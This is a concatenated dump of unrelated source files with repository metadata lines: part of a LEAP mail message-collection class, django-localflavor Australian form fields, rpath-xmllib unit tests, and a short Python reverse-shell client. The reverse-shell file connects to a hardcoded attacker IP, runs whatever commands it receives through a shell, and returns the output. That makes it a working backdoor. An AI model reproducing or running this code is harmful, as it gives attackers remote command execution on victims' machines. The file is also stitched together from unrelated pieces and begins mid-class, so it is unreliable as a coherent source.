fields.RECENTFLAGS_KEY: [],
},
HDOCS_SET_DOC: {
fields.TYPE_KEY: fields.TYPE_HDOCS_SET_VAL,
fields.MBOX_KEY: fields.INBOX_VAL,
fields.HDOCS_SET_KEY: [],
}
}
# Different locks for wrapping both the u1db document getting/setting
# and the property getting/settting in an atomic operation.
# TODO we would abstract this to a SoledadProperty class
_rdoc_lock = threading.Lock()
_rdoc_property_lock = threading.Lock()
_hdocset_lock = threading.Lock()
_hdocset_property_lock = threading.Lock()
def __init__(self, mbox=None, soledad=None, memstore=None):
"""
Constructor for MessageCollection.
On initialization, we ensure that we have a document for
storing the recent flags. The nature of this flag make us wanting
to store the set of the UIDs with this flag at the level of the
MessageCollection for each mailbox, instead of treating them
as a property of each message.
We are passed an instance of MemoryStore, the same for the
SoledadBackedAccount, that we use as a read cache and a buffer
for writes.
:param mbox: the name of the mailbox. It is the name
with which we filter the query over the
messages database.
:type mbox: str
:param soledad: Soledad database
:type soledad: Soledad instance
:param memstore: a MemoryStore instance
:type memstore: MemoryStore
"""
MailParser.__init__(self)
leap_assert(mbox, "Need a mailbox name to initialize")
leap_assert(mbox.strip() != "", "mbox cannot be blank space")
leap_assert(isinstance(mbox, (str, unicode)),
"mbox needs to be a string")
leap_assert(soledad, "Need a soledad instance to initialize")
# okay, all in order, keep going...
self.mbox = self._parse_mailbox_name(mbox)
# XXX get a SoledadStore passed instead
self._soledad = soledad
self.memstore = memstore
self.__rflags = None
self.__hdocset = None
self.initialize_db()
# ensure that we have a recent-flags and a hdocs-sec doc
self._get_or_create_rdoc()
# Not for now...
#self._get_or_create_hdocset()
def _get_empty_doc(self, _type=FLAGS_DOC):
"""
Returns an empty doc for storing different message parts.
Defaults to returning a template for a flags document.
:return: a dict with the template
:rtype: dict
"""
if not _type in self.templates.keys():
raise TypeError("Improper type passed to _get_empty_doc")
return copy.deepcopy(self.templates[_type])
def _get_or_create_rdoc(self):
"""
Try to retrieve the recent-flags doc for this MessageCollection,
and create one if not found.
"""
rdoc = self._get_recent_doc()
if not rdoc:
rdoc = self._get_empty_doc(self.RECENT_DOC)
if self.mbox != fields.INBOX_VAL:
rdoc[fields.MBOX_KEY] = self.mbox
self._soledad.create_doc(rdoc)
def _get_or_create_hdocset(self):
"""
Try to retrieve the hdocs-set doc for this MessageCollection,
and create one if not found.
"""
hdocset = self._get_hdocset_doc()
if not hdocset:
hdocset = self._get_empty_doc(self.HDOCS_SET_DOC)
if self.mbox != fields.INBOX_VAL:
hdocset[fields.MBOX_KEY] = self.mbox
self._soledad.create_doc(hdocset)
def _do_parse(self, raw):
"""
Parse raw message and return it along with
relevant information about its outer level.
:param raw: the raw message
:type raw: StringIO or basestring
:return: msg, chash, size, multi
:rtype: tuple
"""
msg = self._get_parsed_msg(raw)
chash = self._get_hash(msg)
size = len(msg.as_string())
multi = msg.is_multipart()
return msg, chash, size, multi
def _populate_flags(self, flags, uid, chash, size, multi):
"""
Return a flags doc.
XXX Missing DOC -----------
"""
fd = self._get_empty_doc(self.FLAGS_DOC)
fd[self.MBOX_KEY] = self.mbox
fd[self.UID_KEY] = uid
fd[self.CONTENT_HASH_KEY] = chash
fd[self.SIZE_KEY] = size
fd[self.MULTIPART_KEY] = multi
if flags:
fd[self.FLAGS_KEY] = map(self._stringify, flags)
fd[self.SEEN_KEY] = self.SEEN_FLAG in flags
fd[self.DEL_KEY] = self.DELETED_FLAG in flags
fd[self.RECENT_KEY] = True # set always by default
return fd
def _populate_headr(self, msg, chash, subject, date):
"""
Return a headers doc.
XXX Missing DOC -----------
"""
headers = defaultdict(list)
for k, v in msg.items():
headers[k].append(v)
# "fix" for repeated headers.
for k, v in headers.items():
newline = "\n%s: " % (k,)
headers[k] = newline.join(v)
lower_headers = lowerdict(headers)
msgid = first(MSGID_RE.findall(
lower_headers.get('message-id', '')))
hd = self._get_empty_doc(self.HEADERS_DOC)
hd[self.CONTENT_HASH_KEY] = chash
hd[self.HEADERS_KEY] = headers
hd[self.MSGID_KEY] = msgid
if not subject and self.SUBJECT_FIELD in headers:
hd[self.SUBJECT_KEY] = headers[self.SUBJECT_FIELD]
else:
hd[self.SUBJECT_KEY] = subject
if not date and self.DATE_FIELD in headers:
hd[self.DATE_KEY] = headers[self.DATE_FIELD]
else:
hd[self.DATE_KEY] = date
return hd
def _fdoc_already_exists(self, chash):
"""
Check whether we can find a flags doc for this mailbox with the
given content-hash. It enforces that we can only have the same maessage
listed once for a a given mailbox.
:param chash: the content-hash to check about.
:type chash: basestring
:return: False, if it does not exist, or UID.
"""
exist = False
if self.memstore is not None:
exist = self.memstore.get_fdoc_from_chash(chash, self.mbox)
if not exist:
exist = self._get_fdoc_from_chash(chash)
if exist:
return exist.content.get(fields.UID_KEY, "unknown-uid")
else:
return False
def add_msg(self, raw, subject=None, flags=None, date=None, uid=None,
notify_on_disk=False):
"""
Creates a new message document.
:param raw: the raw message
:type raw: str
:param subject: subject of the message.
:type subject: str
:param flags: flags
:type flags: list
:param date: the received date for the message
:type date: str
:param uid: the message uid for this mailbox
:type uid: int
:return: a deferred that will be fired with the message
uid when the adding succeed.
:rtype: deferred
"""
logger.debug('adding message')
if flags is None:
flags = tuple()
leap_assert_type(flags, tuple)
d = defer.Deferred()
self._do_add_msg(raw, flags, subject, date, notify_on_disk, d)
return d
# We SHOULD defer this (or the heavy load here) to the thread pool,
# but it gives troubles with the QSocketNotifier used by Qt...
def _do_add_msg(self, raw, flags, subject, date, notify_on_disk, observer):
"""
Helper that creates a new message document.
Here lives the magic of the leap mail. Well, in soledad, really.
See `add_msg` docstring for parameter info.
:param observer: a deferred that will be fired with the message
uid when the adding succeed.
:type observer: deferred
"""
# TODO signal that we can delete the original message!-----
# when all the processing is done.
# TODO add the linked-from info !
# TODO add reference to the original message
# parse
msg, chash, size, multi = self._do_parse(raw)
# check for uniqueness --------------------------------
# XXX profiler says that this test is costly.
# So we probably should just do an in-memory check and
# move the complete check to the soledad writer?
# Watch out! We're reserving a UID right after this!
existing_uid = self._fdoc_already_exists(chash)
if existing_uid:
logger.warning("We already have that message in this "
"mailbox, unflagging as deleted")
uid = existing_uid
msg = self.get_msg_by_uid(uid)
msg.setFlags((fields.DELETED_FLAG,), -1)
# XXX if this is deferred to thread again we should not use
# the callback in the deferred thread, but return and
# call the callback from the caller fun...
observer.callback(uid)
return
uid = self.memstore.increment_last_soledad_uid(self.mbox)
logger.info("ADDING MSG WITH UID: %s" % uid)
fd = self._populate_flags(flags, uid, chash, size, multi)
hd = self._populate_headr(msg, chash, subject, date)
parts = walk.get_parts(msg)
body_phash_fun = [walk.get_body_phash_simple,
walk.get_body_phash_multi][int(multi)]
body_phash = body_phash_fun(walk.get_payloads(msg))
parts_map = walk.walk_msg_tree(parts, body_phash=body_phash)
# add parts map to header doc
# (body, multi, part_map)
for key in parts_map:
hd[key] = parts_map[key]
del parts_map
hd = stringify_parts_map(hd)
# The MessageContainer expects a dict, one-indexed
cdocs = dict(enumerate(walk.get_raw_docs(msg, parts), 1))
self.set_recent_flag(uid)
msg_container = MessageWrapper(fd, hd, cdocs)
self.memstore.create_message(self.mbox, uid, msg_container,
observer=observer,
notify_on_disk=notify_on_disk)
#
# getters: specific queries
#
# recent flags
def _get_recent_flags(self):
"""
An accessor for the recent-flags set for this mailbox.
"""
# XXX check if we should remove this
if self.__rflags is not None:
return self.__rflags
if self.memstore is not None:
with self._rdoc_lock:
rflags = self.memstore.get_recent_flags(self.mbox)
if not rflags:
# not loaded in the memory store yet.
# let's fetch them from soledad...
rdoc = self._get_recent_doc()
rflags = set(rdoc.content.get(
fields.RECENTFLAGS_KEY, []))
# ...and cache them now.
self.memstore.load_recent_flags(
self.mbox,
{'doc_id': rdoc.doc_id, 'set': rflags})
return rflags
#else:
# fallback for cases without memory store
#with self._rdoc_lock:
#rdoc = self._get_recent_doc()
#self.__rflags = set(rdoc.content.get(
#fields.RECENTFLAGS_KEY, []))
#return self.__rflags
def _set_recent_flags(self, value):
"""
Setter for the recent-flags set for this mailbox.
"""
if self.memstore is not None:
self.memstore.set_recent_flags(self.mbox, value)
#else:
# fallback for cases without memory store
#with self._rdoc_lock:
#rdoc = self._get_recent_doc()
#newv = set(value)
#self.__rflags = newv
#rdoc.content[fields.RECENTFLAGS_KEY] = list(newv)
# XXX should deferLater 0 it?
#self._soledad.put_doc(rdoc)
recent_flags = property(
_get_recent_flags, _set_recent_flags,
doc="Set of UIDs with the recent flag for this mailbox.")
# XXX change naming, indicate soledad query.
def _get_recent_doc(self):
"""
Get recent-flags document from Soledad for this mailbox.
:rtype: SoledadDocument or None
"""
curried = partial(
self._soledad.get_from_index,
fields.TYPE_MBOX_IDX,
fields.TYPE_RECENT_VAL, self.mbox)
curried.expected = "rdoc"
rdoc = try_unique_query(curried)
return rdoc
# Property-set modification (protected by a different
# lock to give atomicity to the read/write operation)
def unset_recent_flags(self, uids):
"""
Unset Recent flag for a sequence of uids.
:param uids: the uids to unset
:type uid: sequence
"""
with self._rdoc_property_lock:
self.recent_flags.difference_update(
set(uids))
# Individual flags operations
def unset_recent_flag(self, uid):
"""
Unset Recent flag for a given uid.
:param uid: the uid to unset
:type uid: int
"""
with self._rdoc_property_lock:
self.recent_flags.difference_update(
set([uid]))
@deferred_to_thread
def set_recent_flag(self, uid):
"""
Set Recent flag for a given uid.
:param uid: the uid to set
:type uid: int
"""
with self._rdoc_property_lock:
self.recent_flags = self.recent_flags.union(
set([uid]))
# individual doc getters, message layer.
def _get_fdoc_from_chash(self, chash):
"""
Return a flags document for this mailbox with a given chash.
:return: A SoledadDocument containing the Flags Document, or None if
the query failed.
:rtype: SoledadDocument or None.
"""
curried = partial(
self._soledad.get_from_index,
fields.TYPE_MBOX_C_HASH_IDX,
fields.TYPE_FLAGS_VAL, self.mbox, chash)
curried.expected = "fdoc"
return try_unique_query(curried)
def _get_uid_from_msgidCb(self, msgid):
hdoc = None
curried = partial(
self._soledad.get_from_index,
fields.TYPE_MSGID_IDX,
fields.TYPE_HEADERS_VAL, msgid)
curried.expected = "hdoc"
hdoc = try_unique_query(curried)
if hdoc is None:
logger.warning("Could not find hdoc for msgid %s"
% (msgid,))
return None
msg_chash = hdoc.content.get(fields.CONTENT_HASH_KEY)
fdoc = self._get_fdoc_from_chash(msg_chash)
if not fdoc:
logger.warning("Could not find fdoc for msgid %s"
% (msgid,))
return None
return fdoc.content.get(fields.UID_KEY, None)
@deferred_to_thread
def _get_uid_from_msgid(self, msgid):
"""
Return a UID for a given message-id.
It first gets the headers-doc for that msg-id, and
it found it queries the flags doc for the current mailbox
for the matching content-hash.
:return: A UID, or None
"""
# We need to wait a little bit, cause in some of the cases
# the query is received right after we've saved the document,
# and we cannot find it otherwise. This seems to be enough.
# XXX do a deferLater instead ??
# XXX is this working?
return self._get_uid_from_msgidCb(msgid)
def set_flags(self, mbox, messages, flags, mode, observer):
"""
Set flags for a sequence of messages.
:param mbox: the mbox this message belongs to
:type mbox: str or unicode
:param messages: the messages to iterate through
:type messages: sequence
:flags: the flags to be set
:type flags: tuple
:param mode: the mode for setting. 1 is append, -1 is remove, 0 set.
:type mode: int
:param observer: a deferred that will be called with the dictionary
mapping UIDs to flags after the operation has been
done.
:type observer: deferred
"""
# XXX we could defer *this* to thread pool, and gather results...
# XXX use deferredList
deferreds = []
for msg_id in messages:
deferreds.append(
self._set_flag_for_uid(msg_id, flags, mode))
def notify(result):
observer.callback(dict(result))
d1 = defer.gatherResults(deferreds, consumeErrors=True)
d1.addCallback(notify)
@deferred_to_thread
def _set_flag_for_uid(self, msg_id, flags, mode):
"""
Run the set_flag operation in the thread pool.
"""
log.msg("MSG ID = %s" % msg_id)
msg = self.get_msg_by_uid(msg_id, mem_only=True, flags_only=True)
if msg is not None:
return msg_id, msg.setFlags(flags, mode)
# getters: generic for a mailbox
def get_msg_by_uid(self, uid, mem_only=False, flags_only=False):
"""
Retrieves a LeapMessage by UID.
This is used primarity in the Mailbox fetch and store methods.
:param uid: the message uid to query by
:type uid: int
:param mem_only: a flag that indicates whether this Message should
pass a reference to soledad to retrieve missing pieces
or not.
:type mem_only: bool
:param flags_only: whether the message should carry only a reference
to the flags document.
:type flags_only: bool
:return: A LeapMessage instance matching the query,
or None if not found.
:rtype: LeapMessage
"""
msg_container = self.memstore.get_message(self.mbox, uid, flags_only)
if msg_container is not None:
if mem_only:
msg = LeapMessage(None, uid, self.mbox, collection=self,
container=msg_container)
else:
# We pass a reference to soledad just to be able to retrieve
# missing parts that cannot be found in the container, like
# the content docs after a copy.
msg = LeapMessage(self._soledad, uid, self.mbox,
collection=self, container=msg_container)
else:
msg = LeapMessage(self._soledad, uid, self.mbox, collection=self)
if not msg.does_exist():
return None
return msg
def get_all_docs(self, _type=fields.TYPE_FLAGS_VAL):
"""
Get all documents for the selected mailbox of the
passed type. By default, it returns the flag docs.
If you want acess to the content, use __iter__ instead
:return: a list of u1db documents
:rtype: list of SoledadDocument
"""
if _type not in fields.__dict__.values():
raise TypeError("Wrong type passed to get_all_docs")
if sameProxiedObjects(self._soledad, None):
logger.warning('Tried to get messages but soledad is None!')
return []
all_docs = [doc for doc in self._soledad.get_from_index(
fields.TYPE_MBOX_IDX,
_type, self.mbox)]
# inneficient, but first let's grok it and then
# let's worry about efficiency.
# XXX FIXINDEX -- should implement order by in soledad
# FIXME ----------------------------------------------
return sorted(all_docs, key=lambda item: item.content['uid'])
def all_soledad_uid_iter(self):
"""
Return an iterator through the UIDs of all messages, sorted in
ascending order.
"""
db_uids = set([doc.content[self.UID_KEY] for doc in
self._soledad.get_from_index(
fields.TYPE_MBOX_IDX,
fields.TYPE_FLAGS_VAL, self.mbox)])
return db_uids
def all_uid_iter(self):
"""
Return an iterator through the UIDs of all messages, from memory.
"""
if self.memstore is not None:
mem_uids = self.memstore.get_uids(self.mbox)
soledad_known_uids = self.memstore.get_soledad_known_uids(
self.mbox)
combined = tuple(set(mem_uids).union(soledad_known_uids))
return combined
# XXX MOVE to memstore
def all_flags(self):
"""
Return a dict with all flags documents for this mailbox.
"""
# XXX get all from memstore and cache it there
# FIXME should get all uids, get them fro memstore,
# and get only the missing ones from disk.
all_flags = dict(((
doc.content[self.UID_KEY],
doc.content[self.FLAGS_KEY]) for doc in
self._soledad.get_from_index(
fields.TYPE_MBOX_IDX,
fields.TYPE_FLAGS_VAL, self.mbox)))
if self.memstore is not None:
uids = self.memstore.get_uids(self.mbox)
docs = ((uid, self.memstore.get_message(self.mbox, uid))
for uid in uids)
for uid, doc in docs:
all_flags[uid] = doc.fdoc.content[self.FLAGS_KEY]
return all_flags
def all_flags_chash(self):
"""
Return a dict with the content-hash for all flag documents
for this mailbox.
"""
all_flags_chash = dict(((
doc.content[self.UID_KEY],
doc.content[self.CONTENT_HASH_KEY]) for doc in
self._soledad.get_from_index(
fields.TYPE_MBOX_IDX,
fields.TYPE_FLAGS_VAL, self.mbox)))
return all_flags_chash
def all_headers(self):
"""
Return a dict with all the headers documents for this
mailbox.
"""
all_headers = dict(((
doc.content[self.CONTENT_HASH_KEY],
doc.content[self.HEADERS_KEY]) for doc in
self._soledad.get_docs(self._hdocset)))
return all_headers
def count(self):
"""
Return the count of messages for this mailbox.
:rtype: int
"""
# XXX We should cache this in memstore too until next write...
count = self._soledad.get_count_from_index(
fields.TYPE_MBOX_IDX,
fields.TYPE_FLAGS_VAL, self.mbox)
if self.memstore is not None:
count += self.memstore.count_new()
return count
# unseen messages
def unseen_iter(self):
"""
Get an iterator for the message UIDs with no `seen` flag
for this mailbox.
:return: iterator through unseen message doc UIDs
:rtype: iterable
"""
return (doc.content[self.UID_KEY] for doc in
self._soledad.get_from_index(
fields.TYPE_MBOX_SEEN_IDX,
fields.TYPE_FLAGS_VAL, self.mbox, '0'))
def count_unseen(self):
"""
Count all messages with the `Unseen` flag.
:returns: count
:rtype: int
"""
count = self._soledad.get_count_from_index(
fields.TYPE_MBOX_SEEN_IDX,
fields.TYPE_FLAGS_VAL, self.mbox, '0')
return count
def get_unseen(self):
"""
Get all messages with the `Unseen` flag
:returns: a list of LeapMessages
:rtype: list
"""
return [LeapMessage(self._soledad, docid, self.mbox)
for docid in self.unseen_iter()]
# recent messages
# XXX take it from memstore
def count_recent(self):
"""
Count all messages with the `Recent` flag.
It just retrieves the length of the recent_flags set,
which is stored in a specific type of document for
this collection.
:returns: count
:rtype: int
"""
return len(self.recent_flags)
def __len__(self):
"""
Returns the number of messages on this mailbox.
:rtype: int
"""
return self.count()
def __iter__(self):
"""
Returns an iterator over all messages.
:returns: iterator of dicts with content for all messages.
:rtype: iterable
"""
return (LeapMessage(self._soledad, docuid, self.mbox)
for docuid in self.all_uid_iter())
def __repr__(self):
"""
Representation string for this object.
"""
return u"<MessageCollection: mbox '%s' (%s)>" % (
self.mbox, self.count())
# XXX should implement __eq__ also !!!
# use chash...
|
gpl-3.0
| -1,798,522,859,234,019,600 | 32.048886 | 79 | 0.563964 | false |
jieter/django-localflavor
|
localflavor/au/forms.py
|
1
|
4119
|
"""Australian-specific Form helpers."""
from __future__ import unicode_literals
import re
from django.forms import ValidationError
from django.forms.fields import CharField, RegexField, Select
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from localflavor.compat import EmptyValueCompatMixin
from localflavor.deprecation import DeprecatedPhoneNumberFormFieldMixin
from .au_states import STATE_CHOICES
from .validators import AUBusinessNumberFieldValidator, AUCompanyNumberFieldValidator, AUTaxFileNumberFieldValidator
PHONE_DIGITS_RE = re.compile(r'^(\d{10})$')
class AUPostCodeField(RegexField):
"""
Australian post code field.
Assumed to be 4 digits.
Northern Territory 3-digit postcodes should have leading zero.
"""
default_error_messages = {
'invalid': _('Enter a 4 digit postcode.'),
}
def __init__(self, max_length=4, min_length=None, *args, **kwargs):
super(AUPostCodeField, self).__init__(r'^\d{4}$',
max_length, min_length, *args, **kwargs)
class AUPhoneNumberField(EmptyValueCompatMixin, CharField, DeprecatedPhoneNumberFormFieldMixin):
"""
A form field that validates input as an Australian phone number.
Valid numbers have ten digits.
"""
default_error_messages = {
'invalid': 'Phone numbers must contain 10 digits.',
}
def clean(self, value):
"""Validate a phone number. Strips parentheses, whitespace and hyphens."""
super(AUPhoneNumberField, self).clean(value)
if value in self.empty_values:
return self.empty_value
value = re.sub('(\(|\)|\s+|-)', '', force_text(value))
phone_match = PHONE_DIGITS_RE.search(value)
if phone_match:
return '%s' % phone_match.group(1)
raise ValidationError(self.error_messages['invalid'])
class AUStateSelect(Select):
"""A Select widget that uses a list of Australian states/territories as its choices."""
def __init__(self, attrs=None):
super(AUStateSelect, self).__init__(attrs, choices=STATE_CHOICES)
class AUBusinessNumberField(EmptyValueCompatMixin, CharField):
"""
A form field that validates input as an Australian Business Number (ABN).
.. versionadded:: 1.3
.. versionchanged:: 1.4
"""
default_validators = [AUBusinessNumberFieldValidator()]
def to_python(self, value):
value = super(AUBusinessNumberField, self).to_python(value)
if value in self.empty_values:
return self.empty_value
return value.upper().replace(' ', '')
def prepare_value(self, value):
"""Format the value for display."""
if value is None:
return value
spaceless = ''.join(value.split())
return '{} {} {} {}'.format(spaceless[:2], spaceless[2:5], spaceless[5:8], spaceless[8:])
class AUCompanyNumberField(EmptyValueCompatMixin, CharField):
"""
A form field that validates input as an Australian Company Number (ACN).
.. versionadded:: 1.5
"""
default_validators = [AUCompanyNumberFieldValidator()]
def to_python(self, value):
value = super(AUCompanyNumberField, self).to_python(value)
if value in self.empty_values:
return self.empty_value
return value.upper().replace(' ', '')
def prepare_value(self, value):
"""Format the value for display."""
if value is None:
return value
spaceless = ''.join(value.split())
return '{} {} {}'.format(spaceless[:3], spaceless[3:6], spaceless[6:])
class AUTaxFileNumberField(CharField):
"""
A form field that validates input as an Australian Tax File Number (TFN).
.. versionadded:: 1.4
"""
default_validators = [AUTaxFileNumberFieldValidator()]
def prepare_value(self, value):
"""Format the value for display."""
if value is None:
return value
spaceless = ''.join(value.split())
return '{} {} {}'.format(spaceless[:3], spaceless[3:6], spaceless[6:])
|
bsd-3-clause
| -3,051,444,075,775,757,000 | 30.204545 | 116 | 0.651129 | false |
SentinelWarren/Reverse-Shell
|
src/reverse_client_tcp_shell.py
|
1
|
1196
|
import socket # For starting TCP connection
import subprocess # To start the shell in the system
# Attacker IP goes here
ATT_IP = "10.254.141.59"
def connect():
# Creating object soketi
soketi = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# attackers ( kali system ) IP address and port.
soketi.connect((ATT_IP, 8080))
while True: # Waiting for commands
# read the first 1024 KB of the tcp socket
komandi = soketi.recv(1024)
if 'terminate' in komandi: # Terminate - Break
soketi.close()
break
else: # else pass command to shell.
CMD = subprocess.Popen(komandi, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
soketi.send(CMD.stdout.read()) # send back the result
# send back the error -if any-, such as syntax error
soketi.send(CMD.stderr.read())
if __name__ == "__main__":
connect()
|
gpl-3.0
| -3,769,709,386,116,838,400 | 35.242424 | 126 | 0.51087 | false |
sassoftware/rpath-xmllib
|
xmllib_test/xmllibtest.py
|
1
|
37179
|
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import StringIO
import tempfile
from lxml import etree
import rpath_xmllib as xmllib
# This is an unused import, but it should make the test suite depend on api1
from rpath_xmllib import api1 as xmllib1 # pyflakes=ignore
from testrunner import testhelp
class BaseTest(testhelp.TestCase):
pass
class DataBindingNodeTest(BaseTest):
def testSerializableNodeInterface(self):
node = xmllib.SerializableObject()
self.failUnlessRaises(NotImplementedError, node._getName)
self.failUnlessRaises(NotImplementedError, node._getLocalNamespaces)
self.failUnlessRaises(NotImplementedError, node._iterAttributes)
self.failUnlessRaises(NotImplementedError, node._iterChildren)
self.failUnlessRaises(NotImplementedError, node.getElementTree)
def testGetApiVersion(self):
self.failUnlessEqual(xmllib.VERSION, '0.1')
def testIterAttributes(self):
refAttrs = {'xmlns' : 'a', 'xmlns:ns' : 'b',
'ns:attr1' : 'val1', 'attr2' : 'val2'}
node = xmllib.BaseNode(refAttrs)
attrs = dict(x for x in node.iterAttributes())
self.failUnlessEqual(attrs, refAttrs)
node.setName('ns:foo')
binder = xmllib.DataBinder()
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
'<ns:foo xmlns="a" xmlns:ns="b" attr2="val2" ns:attr1="val1"/>')
def testGetChildren(self):
binder = xmllib.DataBinder()
rootNode = binder.parseFile(StringIO.StringIO("""
<nsB:root xmlns="def" xmlns:nsA="a" xmlns:nsB="b">
<nsA:child>childA</nsA:child>
<nsB:child>childB</nsB:child>
<child>childDef</child>
</nsB:root>
"""))
self.failUnlessEqual([ x.getText()
for x in rootNode.getChildren('child', 'nsA')], ['childA'])
self.failUnlessEqual([ x.getText()
for x in rootNode.getChildren('child', 'nsB')], ['childB'])
self.failUnlessEqual([ x.getText()
for x in rootNode.getChildren('child')], ['childDef'])
def testGetAttribute(self):
# We are redefining namespace nsC, which is not supported
refAttrs = {'xmlns' : 'a', 'xmlns:nsB' : 'b', 'xmlns:nsC' : 'b',
'attr' : 'val1', 'nsB:attr' : 'val2', 'nsC:attr' : 'val3'}
node = xmllib.BaseNode(refAttrs, name = 'root')
self.failUnlessEqual(node.getAttribute('attr'), 'val1')
self.failUnlessEqual(node.getAttribute('attr', 'nsB'), 'val2')
self.failUnlessEqual(node.getAttribute('attr', 'nsC'), 'val3')
self.failUnlessEqual(node.getAttribute('attr', 'EEE'), None)
self.failUnlessEqual(node.getAttributeByNamespace('attr'), 'val1')
self.failUnlessEqual(node.getAttributeByNamespace('attr', 'a'), 'val1')
# This is the same attribute, we just happen to have two identical
self.failUnlessEqual(node.getAttributeByNamespace('attr', 'b'), 'val2')
self.failUnlessEqual(node.getAttributeByNamespace('attr', 'E'), None)
# Make sure we get the right namespaces albeit dubplicated)
self.failUnlessEqual(list(node.iterNamespaces()),
[(None, 'a'), ('nsB', 'b'), ('nsC', 'b')])
# lxml will notice the re-definition of a namespace
binder = xmllib.DataBinder()
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
'<root xmlns="a" xmlns:nsB="b" xmlns:nsC="b" nsB:attr="val3" attr="val1"/>')
def testSlotBased(self):
class S(xmllib.SlotBasedSerializableObject):
tag = 'Blah'
__slots__ = ['attr1', 'child1', 'maybe']
binder = xmllib.DataBinder()
node = S()
node.attr1 = 1
node.child1 = xmllib.BooleanNode().characters('true')
node.maybe = xmllib.StringNode().characters('Maybe')
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
'<Blah attr1="1"><bool>true</bool><string>Maybe</string></Blah>')
node.maybe = {}
self.failUnlessRaises(xmllib.XmlLibError, binder.toXml, node)
def testSlotBasedEq(self):
class WithSlots(xmllib.SlotBasedSerializableObject):
tag = "something"
__slots__ = ['foo']
node1 = WithSlots()
node2 = WithSlots()
node1.foo = 'foo'
node2.foo = 'foo'
self.assertEquals(node1, node2)
node1.foo = 'foo'
node2.foo = 'fo0'
self.assertEquals(node1 == node2, False)
self.assertEquals(node1 != node2, True)
def testUndefinedNamespace(self):
attrs = {'ns:attr1' : 'val1'}
self.failUnlessRaises(xmllib.UndefinedNamespaceError,
xmllib.BaseNode, attrs)
def testCreateElementTree(self):
attrs = {'{a}attr1' : 'val1', 'xmlns' : 'b'}
ns = {'ns' : 'a'}
n = xmllib.createElementTree('node', attrs, ns)
self.assertXMLEquals(etree.tostring(n),
'<node xmlns:ns="a" ns:attr1="val1" xmlns="b"/>')
attrs = {'{a}attr1' : 'va11', '{c}attr2' : 'val2'}
ns = {'nsc' : 'c'}
n2 = xmllib.createElementTree('{c}subnode', attrs, ns, parent = n)
self.assertXMLEquals(etree.tostring(n),
'<node xmlns:ns="a" ns:attr1="val1" xmlns="b">'
'<nsc:subnode xmlns:nsc="c" ns:attr1="va11" nsc:attr2="val2"/>'
'</node>')
n3 = xmllib.createElementTree('{a}subnode', {}, parent = n)
n3.text = 'node text'
self.assertXMLEquals(etree.tostring(n),
'<node xmlns:ns="a" ns:attr1="val1" xmlns="b">'
'<nsc:subnode xmlns:nsc="c" ns:attr1="va11" nsc:attr2="val2"/>'
'<ns:subnode>node text</ns:subnode>'
'</node>')
def testSplitNamespace(self):
self.failUnlessEqual(xmllib.splitNamespace('a'), (None, 'a'))
self.failUnlessEqual(xmllib.splitNamespace('b:a'), ('b', 'a'))
def testUnsplitNamespace(self):
self.failUnlessEqual(xmllib.unsplitNamespace('a'), 'a')
self.failUnlessEqual(xmllib.unsplitNamespace('a', None), 'a')
self.failUnlessEqual(xmllib.unsplitNamespace('a', 'b'), 'b:a')
def testGetAbsoluteName(self):
# No namespace specified
node = xmllib.BaseNode()
node.setName('foo')
self.failUnlessEqual(node.getAbsoluteName(), 'foo')
# With a default namespace
node = xmllib.BaseNode(dict(xmlns = "a"))
node.setName('foo')
self.failUnlessEqual(node.getAbsoluteName(), '{a}foo')
# With a namespace
node = xmllib.BaseNode({'xmlns' : 'b', 'xmlns:ns' : 'a'})
node.setName('ns:foo')
self.failUnlessEqual(node.getAbsoluteName(), '{a}foo')
node.setName('foo')
self.failUnlessEqual(node.getAbsoluteName(), '{b}foo')
# With a bad namespace
self.failUnlessRaises(xmllib.UndefinedNamespaceError,
node.setName, 'nosuchns:foo')
def testIntObj(self):
node = xmllib.IntegerNode()
node.characters('3')
self.assertEquals(node.finalize(), 3)
def testIntObjInfoLoss(self):
node = xmllib.IntegerNode()
self.failUnlessRaises(AttributeError, setattr, node, 'garbage', 'data')
node.__class__.test = 'foo'
res = node.finalize()
self.failIf(hasattr(res.__class__, 'test'))
self.assertEquals(res, 0)
def testStringObj(self):
node = xmllib.StringNode()
node.characters('foo')
self.assertEquals(node.finalize(), 'foo')
def testBooleanNode(self):
node = xmllib.BooleanNode()
node.characters('true')
self.assertEquals(node.finalize(), True)
node = xmllib.BooleanNode()
node.characters('False')
self.assertEquals(node.finalize(), False)
node = xmllib.BooleanNode()
node.characters('1')
self.assertEquals(node.finalize(), True)
node = xmllib.BooleanNode()
node.characters('0')
self.assertEquals(node.finalize(), False)
self.failUnlessEqual(node.fromString(True), True)
self.failUnlessEqual(node.fromString(False), False)
self.failUnlessEqual(node.fromString("tRuE"), True)
self.failUnlessEqual(node.fromString("1"), True)
self.failUnlessEqual(node.fromString("abcde"), False)
def testNullNode(self):
node = xmllib.NullNode()
node.characters('anything at all')
self.assertEquals(node.finalize(), None)
binder = xmllib.DataBinder()
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
"<none/>")
def testCompositeNode(self):
class CompNode(xmllib.BaseNode):
_singleChildren = ['integerData', 'stringData']
node = CompNode()
child = xmllib.IntegerNode(name = 'integerData')
child.characters('3')
node.addChild(child)
self.assertEquals(node.integerData, 3)
child = xmllib.StringNode(name = 'stringData')
child.setName('stringData')
child.characters('foo')
node.addChild(child)
self.assertEquals(node.stringData, 'foo')
child = xmllib.StringNode(name = 'unknownData')
child.characters('bar')
node.addChild(child)
self.failIf(hasattr(node, 'unknownData'))
self.failUnlessEqual([ x for x in node.iterChildren() ], ['bar'])
class ContentHandlerTest(BaseTest):
def testInvalidData(self):
data = "vadfadfadf"
binder = xmllib.DataBinder()
self.failUnlessRaises(xmllib.InvalidXML,
binder.parseString, data)
def testToplevelNode(self):
# Some invalid XML
data = "vadfadfadf"
tn = xmllib.ToplevelNode(data)
self.failUnlessEqual(tn.name, None)
